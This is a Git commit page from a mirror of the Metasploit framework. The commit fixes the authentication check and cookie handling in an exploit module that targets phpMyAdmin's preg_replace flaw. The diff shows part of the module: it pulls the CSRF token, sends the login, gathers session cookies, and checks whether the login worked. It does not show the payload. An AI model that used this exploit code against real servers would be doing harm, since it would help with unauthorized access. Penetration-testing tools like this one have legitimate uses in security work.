infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix auth check and cookie handling

unstable
Meatballs 2013-04-26 17:10:24 +01:00
parent 025315e4e4
commit a043d3b456
1 changed files with 15 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
modules/exploits/multi/http/phpmyadmin_preg_replace.rb
View File

@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
if (response.body !~ /"token"\s*value="([^"]*)"/) if (response.body !~ /"token"\s*value="([^"]*)"/)
fail_with(Exploit::Failure::NotFound, "Couldn't find token and can't continue without it. Is URI set correctly?") fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
else else
print_good("Retrieved token") print_good("Retrieved token")
end end
@ -134,17 +134,24 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
end end
if login.code != 302
fail_with(Exploit::Failure::NotFound, "Authentication failed.")
else
print_good("Authentication successful")
end
token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first
cookie = "" cookie = ""
cookie_names.each do |name| cookie_names.each do |name|
cookie << login.get_cookie(name) << " " c = login.get_cookie(name)
cookie << c << " " unless c.nil?
end
login_check = send_request_cgi({
'uri' => uri('index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookie
})
if login_check.body =~ /Welcome to/
fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
else
print_good("Authentication successful")
end end
db = rand_text_alpha(3+rand(3)) db = rand_text_alpha(3+rand(3))